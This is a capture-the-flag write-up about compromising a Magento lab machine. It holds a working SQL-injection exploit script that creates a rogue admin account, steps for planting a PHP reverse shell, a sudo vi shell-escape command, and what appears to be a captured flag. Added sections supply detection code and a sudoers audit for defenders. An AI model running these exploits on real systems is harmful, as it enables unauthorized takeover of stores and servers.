An Nmap scan shows SSH and HTTP open:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Browsing the HTTP service shows that it runs the Magento CMS.

Exploit-DB has a proof-of-concept for it:

```python
import requests
import base64
import sys

target = "10.10.10.140"

if not target.startswith("http"):
    target = "http://" + target
if target.endswith("/"):
    target = target[:-1]
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

# SQL chained onto the report grid filter: inserts an admin_user row whose
# password uses Magento's hash layout (MD5(salt + password) + ':' + salt)
# and attaches an admin_role row to it.
q = """
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

query = q.replace("\n", "").format(username="forme", password="forme")

# The closing ")" ends the grid's field expression; everything after ";" is the injected SQL.
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ
# decodes to {{block type=Adminhtml/report_search_grid output=getCsvFile}}

r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter.encode()).decode(),
                        "forwarded": 1})
if r.ok:
    print("WORKED")
    print("Check {0}/admin with creds forme:forme".format(target))
else:
    print("DID NOT WORK")
```

Once the exploit succeeds, the target has a new administrator account with the credentials forme:forme.
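From the defender's side, the request shape above is easy to recognise: a POST to the Cms_Wysiwyg directive endpoint whose base64 `filter` field, once decoded, closes the grid expression with `)` and chains SQL after `;`. The inspector below is an added example and is not part of the original write-up or of Magento; the endpoint path is the one the PoC posts to, and the sample requests are constructed here.

```python
import base64
import re

# Endpoint the Cms_Wysiwyg SQL injection PoC above posts to (path taken from the PoC).
DIRECTIVE_PATH = "/index.php/admin/Cms_Wysiwyg/directive/index/"

# A legitimate grid filter is only key=value pairs; an injected one closes the
# report expression with ")" and chains further SQL statements after ";".
SQL_CHAIN_RE = re.compile(r"\)\s*;\s*(SET|SELECT|INSERT|UPDATE|DELETE|DROP|UNION)\b", re.I)
# Characters that have no business in a numeric or date grid filter value.
BAD_VALUE_CHARS = re.compile(r"['\";()]")


def decode_filter(filter_b64):
    """Decode the base64 'filter' form field; return None if it is not valid base64."""
    try:
        return base64.b64decode(filter_b64, validate=True).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return None


def inspect_request(path, form):
    """Classify one POST request as 'ok', 'suspicious' or 'attack', with a reason."""
    if not path.startswith(DIRECTIVE_PATH):
        return "ok", "not the Cms_Wysiwyg directive endpoint"
    raw = form.get("filter")
    if raw is None:
        return "ok", "no filter field"
    decoded = decode_filter(raw)
    if decoded is None:
        return "suspicious", "filter field is not valid base64"
    if SQL_CHAIN_RE.search(decoded):
        return "attack", "filter closes the expression and chains SQL: %r" % decoded[:60]
    for pair in decoded.split("&"):
        key, _, value = pair.partition("=")
        if BAD_VALUE_CHARS.search(value):
            return "suspicious", "unexpected characters in filter value for %r" % key
    return "ok", "filter looks like a plain grid filter"


def scan(requests):
    """Run inspect_request over (path, form) tuples and return the verdicts."""
    return [inspect_request(path, form)[0] for path, form in requests]


def b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample traffic: unrelated page, a normal report filter,
# the PoC's filter shape, and a filter field that is not base64 at all.
SAMPLE_REQUESTS = [
    ("/index.php/", {"q": "shoes"}),
    (DIRECTIVE_PATH, {"filter": b64("popularity[from]=0&popularity[to]=3")}),
    (DIRECTIVE_PATH, {"filter": b64("popularity[from]=0&popularity[to]=3"
                                     "&popularity[field_expr]=0);SET @SALT = 'rp';")}),
    (DIRECTIVE_PATH, {"filter": "%%%not-base64%%%"}),
]

if __name__ == "__main__":
    for (path, form), verdict in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(verdict, path, inspect_request(path, form)[1])
```

The same check can be run over captured POST bodies from a reverse proxy or WAF log; Apache's default access log does not record bodies, so the `filter` field has to come from wherever request bodies are retained. Anything flagged `attack` should be followed by a look at `admin_user` for rows created around that time, since that is the artifact this injection leaves behind.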

The admin login page is at http://10.10.10.140/index.php/admin/

The usual next step would be to upload PHP and get a reverse shell, but image uploads in this CMS require the Adobe Flash plugin; the upload goes through Flash and Burp cannot intercept it, so uploading PHP via the image upload is not an option.

Change of approach: some googling shows that a file system feature can be enabled by installing a plugin.

https://pluginarchive.com/magento/magpleasure_filesystem

Upload and install the plugin at http://10.10.10.140/downloader/

Then insert PHP reverse shell code into any file; requesting that file yields a reverse shell.

Running LinEnum on the box then reveals a SUID configuration vulnerability.

/usr/bin/vi /var/www/html/* can be run as root via sudo.

First upgrade to a full interactive TTY shell.

sudo /usr/bin/vi /var/www/html/1 -c ':!/bin/sh'
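The rule behind this step combines two sudoers weaknesses: an editor that can run commands once it is started as root, and a wildcard that lets the caller choose the argument. The audit script below is an added example, not part of the write-up or of LinEnum; it parses user-spec lines and flags both patterns. The write-up does not show the real sudoers file, so the sample rules are constructed here in the shape the write-up describes.

```python
import re
from pathlib import PurePosixPath

# One sudoers user spec: user host=(runas) [TAG:]... command[, command]...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Programs that let the caller run further commands once started as root
# (editors, pagers, interpreters, shells); /usr/bin/vi from the write-up is one.
SHELL_ESCAPE_BINS = {
    "vi", "vim", "view", "nano", "less", "more", "man",
    "awk", "find", "perl", "python", "python3", "sh", "bash",
}


def parse_rule(line):
    """Return the parsed user-spec as a dict, or None for comments, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                    "Host_Alias", "Runas_Alias")):
        return None
    m = RULE_RE.match(line)
    return m.groupdict() if m else None


def check_command(cmd):
    """Reasons why a single sudo command spec is risky (empty list if none)."""
    cmd = cmd.strip()
    if cmd == "ALL":
        return ["unrestricted: any command as the run-as user"]
    parts = cmd.split()
    binary = PurePosixPath(parts[0]).name
    args = " ".join(parts[1:])
    reasons = []
    if binary in SHELL_ESCAPE_BINS:
        reasons.append("%s can spawn a shell or run commands" % binary)
    if any(ch in args for ch in "*?["):
        reasons.append("wildcard in arguments lets the caller pick the target")
    return reasons


def audit_sudoers(text):
    """Return one finding per risky command: user, runas, nopasswd, command, reasons."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["user"] == "root":
            continue
        for cmd in rule["cmds"].split(","):
            reasons = check_command(cmd)
            if reasons:
                findings.append({
                    "user": rule["user"],
                    "runas": rule["runas"] or "root",
                    "nopasswd": "NOPASSWD:" in rule["tags"],
                    "command": cmd.strip(),
                    "reasons": reasons,
                })
    return findings


# Constructed sample; the write-up does not show the real sudoers file.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
# editor as root with a caller-controlled path: the pattern from the write-up
www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup   ALL=(root) NOPASSWD: sudoedit /etc/backup.conf
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("%s -> %s: %s" % (f["user"], f["command"], "; ".join(f["reasons"])))
```

Only the `www-data` rule is reported, for both reasons. The fix for that class of rule is the one the `backup` line shows: `sudoedit` runs the editor as the calling user and only copies the saved file into place as root, so `:!` escapes gain nothing, and a fixed file path (or a small wrapper script with no arguments) replaces the `*`.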

c2b087d66e14a652a3b86a130ac56721